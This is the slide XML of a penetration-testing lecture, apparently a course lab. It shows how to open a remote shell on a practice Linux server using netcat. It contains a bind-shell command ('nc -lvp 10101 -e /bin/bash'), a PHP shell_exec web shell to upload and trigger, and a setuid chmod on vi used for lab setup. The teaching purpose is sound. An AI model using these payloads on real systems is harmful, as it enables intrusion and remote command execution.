              <a:t>From that point we can concentrate on a hack.</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909956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Remote shell</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6332222"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A standard mechanism in penetration testing is trying to get access to the machine we are attacking in a way that will let us type commands on it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This is known as creating a “remote shell” on the target machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>There are many ways to do this but what we will be experimenting with is using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FABE1D7-B157-F659-DE07-D157A2232FF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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD729BCB-F125-385C-05D4-C75AA1C2F2E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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843056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Remote shell</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633222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Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> utility that takes any input/output stream and sends it over the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>It also can make an application sit and listen for network traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6419BA0-8F77-7A34-237F-51354E73757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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8886318-48A3-CB0B-FD63-C5FF276A2973}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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3121741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Remote shell</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6332222"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One terribly easy way to do this is if the machine we are targeting has a copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> on it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>In that case all we need to do is get the remote machine to type the following command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc -lvp 10101 -e /bin/bash</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="de-DE" sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D2ED543-CF4A-4853-4CB3-268D4756C1C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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E54FDBF-B777-D630-300D-BDC9B04818DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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415779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Remote shell</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6332222"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” is the name of the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” program on Linux.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The “l” in –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> tells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to “listen” for a network connection.  This means we will be connecting to this machine from our own machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The “v” means “verbose” which means give us as much information as possible if something goes wrong.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The “p” means connect on a specific port.  In this case 10101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{288A2847-77C9-FFC9-5FAE-C7D90BA666B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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE747A76-FE80-0ADB-542D-703F0EAD4C73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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39711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Getting started</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80" y="2120900"/>
            <a:ext cx="10058400" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To follow along download the zip file marked “Files for lecture 12” and extract its contents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are four php scripts:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>includer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_main.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_adminer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_gallery.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. Upload all three of them to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>TurnKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux server in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/var/www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> directory!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will also need to log into the console on your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TurnKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server and run a few commands.  So point your browser at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://&lt;your sever IP&gt;:12320</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>and log in as root.  Then enter the following commands:</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rPr>
              <a:t>apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netcat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apt-get install vi-tiny</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+4000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /usr/bin/vi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.tiny</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mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /var/www/test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We will explain what these do later.</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3179011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Remote shell</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6332222" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The choice of port is important.  Port numbers 1024 or less are usually reserved and require administrator access to use.  So, choose a nice high port number (less than 65535) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” is an operating system command.  We know that we can get it to run with a PHP script like:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2400" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell_exec</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nc</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lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 10101 -e /bin/bash'); ?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758813F4-D1FA-AB9A-2852-5AF8262D32B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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5890B966-1A63-7230-1048-505D3F102F92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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360091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Remote shell</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6332222"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All we need to do now is get it uploaded! Go ahead and do that now.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>To get the script to run all we need to do is point our browser at its URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Since PHP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> command is synchronous.  The script will wait until “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” has finished.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>However, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” won’t exit until we tell it to.  So, if we’ve done everything right the browser should act as if it’s constantly waiting to load the page, but nothing is displayed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B8FC29C-DEEF-0F6A-0D70-19F3A012482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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35F96F54-7336-6CC6-1D31-35B2F569EB3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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3906072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Remote shell</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6332222"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When we see that we know our remote shell has been created and is waiting for us to connect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>To do this open a command shell on your computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
